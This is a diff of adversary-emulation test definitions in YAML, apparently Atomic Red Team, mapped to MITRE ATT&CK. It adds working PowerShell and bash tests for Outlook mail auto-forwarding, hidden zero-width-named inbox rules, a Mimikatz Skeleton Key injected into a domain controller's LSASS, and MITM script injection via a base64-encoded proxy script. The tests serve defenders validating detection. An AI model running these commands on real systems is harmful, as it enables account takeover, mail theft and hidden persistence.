+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $action = $rule.Actions.Forward
+          $action.Enabled = $true
+          $action.Recipients.Add("#{forward_to_address}")
+          $action.Recipients.ResolveAll() | Out-Null
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+          Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+      auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
+      description: |
+        Enumerates all Outlook rules configured on the local profile using the
+        PowerShell COM object. Simulates the discovery phase where an adversary
+        audits existing rules before implanting their own, or where a threat actor
+        tool such as Ruler lists rules to understand the environment. This
+        enumeration should itself generate telemetry - use it to validate that
+        your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook = New-Object -ComObject Outlook.Application
+          $rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+          Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+          Write-Host "    Total rules found: $($rules.Count)`n"
+
+          for ($i = 1; $i -le $rules.Count; $i++) {
+              $r = $rules.Item($i)
+              Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+          }
+
+          if ($rules.Count -eq 0) {
+              Write-Host "  (No rules configured)"
+          }
+        cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
+
+          '
+    - name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+      auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
+      description: |
+        Creates an Outlook rule with a zero-width space as its display name,
+        making it appear blank and invisible in the standard Outlook Rules UI.
+        Simulates the hidden inbox rule technique documented by Damian Pfammatter
+        (2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+        editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+        during casual rule auditing. Tests whether monitoring catches rules that
+        are invisible in the Outlook GUI but detectable via MFCMapi or
+        Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+        cannot be created programmatically per Microsoft's Rules object model.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+        NOTE: Script is written to a temp file before execution to prevent the
+        ART executor's quote-wrapping from mangling the zero-width space bytes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        trigger_subject:
+          description: Subject keyword to trigger the hidden rule
+          type: string
+          default: atomic-rt-hidden
+        sound_file_path:
+          description: Path to .wav file used as the rule action payload indicator
+          type: string
+          default: C:\Windows\Media\notify.wav
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      - description: Sound file must exist for PlaySound action
+        prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: |
+          Write-Host "[-] Sound file not found at #{sound_file_path}"
+          Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook   = New-Object -ComObject Outlook.Application',
+              '$namespace = $outlook.GetNamespace("MAPI")',
+              '$rules     = $namespace.DefaultStore.GetRules()',
+              '$rule      = $rules.Create($hiddenName, 0)',
+              '$cond = $rule.Conditions.Subject',
+              '$cond.Enabled = $true',
+              '$cond.Text    = @("#{trigger_subject}")',
+              '$action          = $rule.Actions.PlaySound',
+              '$action.Enabled  = $true',
+              '$action.FilePath = "#{sound_file_path}"',
+              '$rule.Enabled = $true',
+              '$rules.Save()',
+              'Write-Host "[+] Hidden rule created with zero-width space name."',
+              'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+              'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook    = New-Object -ComObject Outlook.Application',
+              '$namespace  = $outlook.GetNamespace("MAPI")',
+              '$rules      = $namespace.DefaultStore.GetRules()',
+              '$removed    = $false',
+              'for ($i = $rules.Count; $i -ge 1; $i--) {',
+              '    if ($rules.Item($i).Name -eq $hiddenName) {',
+              '        $rules.Remove($rules.Item($i).Name)',
+              '        $removed = $true',
+              '    }',
+              '}',
+              'if ($removed) {',
+              '    $rules.Save()',
+              '    Write-Host "[+] Hidden rule(s) removed."',
+              '} else {',
+              '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+              '}'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
   T1098.007:
     technique:
       type: attack-pattern
@@ -73169,7 +74200,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -73199,7 +74230,54 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
   T1556.005:
     technique:
       type: attack-pattern
@@ -76227,7 +77305,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -76254,7 +77332,45 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
-    atomic_tests: []
+      identifier: T1568.002
+    atomic_tests:
+    - name: DGA Simulation (Python)
+      auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
+      description: "Simulates Domain Generation Algorithm (DGA) traffic by generating
+        pseudo-random domains based on the current date and querying them using dig.
+        \nThis is designed to trigger DNS analytics and NGIDS.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_script_path:
+          description: Full path to the DGA python script
+          type: string
+          default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
+      dependency_executor_name: bash
+      dependencies:
+      - description: "#{python_script_path} must exist on system.\n"
+        prereq_command: 'if [ -f "#{python_script_path}" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: |
+          mkdir -p "$(dirname "#{python_script_path}")"
+          curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
+      - description: 'Python 3 must be installed to run the script.
+
+          '
+        prereq_command: 'which python3
+
+          '
+        get_prereq_command: 'sudo apt-get update && sudo apt-get install -y python3
+
+          '
+      executor:
+        command: 'python3 "#{python_script_path}"
+
+          '
+        name: bash
+        elevation_required: false
   T1071.004:
     technique:
       type: attack-pattern
@@ -77218,7 +78334,126 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection
+      auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+      description: Start mitmdump and verify injected header and HTML content.
+      supported_platforms:
+      - macos
+      - linux
+      dependencies:
+      - description: python3 must be installed
+        prereq_command: 'command -v python3
+
+          '
+        get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
+          apt-get install -y python3) || sudo yum install -y python3
+
+          '
+      - description: curl must be installed
+        prereq_command: 'command -v curl
+
+          '
+        get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
+          install -y curl) || sudo yum install -y curl
+
+          '
+      - description: pipx must be installed
+        prereq_command: 'pipx --version
+
+          '
+        get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
+          install -y pipx) || sudo yum install -y pipx
+
+          '
+      - description: mitmproxy must be installed
+        prereq_command: 'pipx list | grep mitmproxy
+
+          '
+        get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'lsof -i tcp:8080 | grep mitmdump
+
+          '
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+      executor:
+        name: bash
+        command: |
+          curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+          grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+          curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+          grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+        cleanup_command: |
+          rm -rf /tmp/atomic_t1659_inject.py
+          rm -rf /tmp/atomic_t1659.log
+          rm -rf /tmp/curl_out.txt
+          rm -rf /tmp/atomic_t1659_page.html
+          pkill -f mitmdump || true
+    - name: MITM Proxy Injection (Windows)
+      auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+      description: Start mitmdump proxy with injection script in the background.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Python must be installed
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id Python.Python.3 -e
+
+          '
+      - description: curl must be installed
+        prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id cURL.cURL -e
+
+          '
+      - description: mitmproxy must be installed and in PATH
+        prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'python -m pip install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
+          | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
+          -like "*mitmdump*" }) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: |
+          $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
+          [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
+          Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
+          Start-Sleep -Seconds 5
+          if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
+          if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
+          $OutPath = "$env:TEMP\atomic_t1659_page.html"
+          curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
+          $Content = Get-Content -Path $OutPath -Raw
+          if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
+        cleanup_command: |
+          Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
   T1205:
     technique:
       type: attack-pattern
@@ -98483,7 +99718,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -98513,7 +99748,54 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
   T1556.005:
     technique:
       type: attack-pattern
@@ -120112,7 +121394,126 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection
+      auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+      description: Start mitmdump and verify injected header and HTML content.
+      supported_platforms:
+      - macos
+      - linux
+      dependencies:
+      - description: python3 must be installed
+        prereq_command: 'command -v python3
+
+          '
+        get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
+          apt-get install -y python3) || sudo yum install -y python3
+
+          '
+      - description: curl must be installed
+        prereq_command: 'command -v curl
+
+          '
+        get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
+          install -y curl) || sudo yum install -y curl
+
+          '
+      - description: pipx must be installed
+        prereq_command: 'pipx --version
+
+          '
+        get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
+          install -y pipx) || sudo yum install -y pipx
+
+          '
+      - description: mitmproxy must be installed
+        prereq_command: 'pipx list | grep mitmproxy
+
+          '
+        get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'lsof -i tcp:8080 | grep mitmdump
+
+          '
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+      executor:
+        name: bash
+        command: |
+          curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+          grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+          curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+          grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+        cleanup_command: |
+          rm -rf /tmp/atomic_t1659_inject.py
+          rm -rf /tmp/atomic_t1659.log
+          rm -rf /tmp/curl_out.txt
+          rm -rf /tmp/atomic_t1659_page.html
+          pkill -f mitmdump || true
+    - name: MITM Proxy Injection (Windows)
+      auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+      description: Start mitmdump proxy with injection script in the background.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Python must be installed
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id Python.Python.3 -e
+
+          '
+      - description: curl must be installed
+        prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id cURL.cURL -e
+
+          '
+      - description: mitmproxy must be installed and in PATH
+        prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'python -m pip install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
+          | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
+          -like "*mitmdump*" }) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: |
+          $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
+          [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
+          Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
+          Start-Sleep -Seconds 5
+          if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
+          if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
+          $OutPath = "$env:TEMP\atomic_t1659_page.html"
+          curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
+          $Content = Get-Content -Path $OutPath -Raw
+          if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
+        cleanup_command: |
+          Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
   T1078.001:
     technique:
       type: attack-pattern

atomics/Indexes/linux-index.yaml

@@ -1530,8 +1530,9 @@ defense-evasion:
           $bytes = [System.Convert]::FromBase64String($encodedString)
           $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
           #write the decoded eicar string to file
-          $decodedString | Out-File T1027.013_decodedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+          $decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
+          Ignore
         name: powershell
         elevation_required: false
     - name: Decrypt Eicar File and Write to File
@@ -1549,8 +1550,9 @@ defense-evasion:
           $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
           $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
           #Write the decrypted eicar string to a file
-          $decryptedString | out-file T1027.013_decryptedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+          $decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
+          -ErrorAction Ignore
         name: powershell
         elevation_required: false
     - name: Password-Protected ZIP Payload Extraction and Execution
@@ -15152,7 +15154,7 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
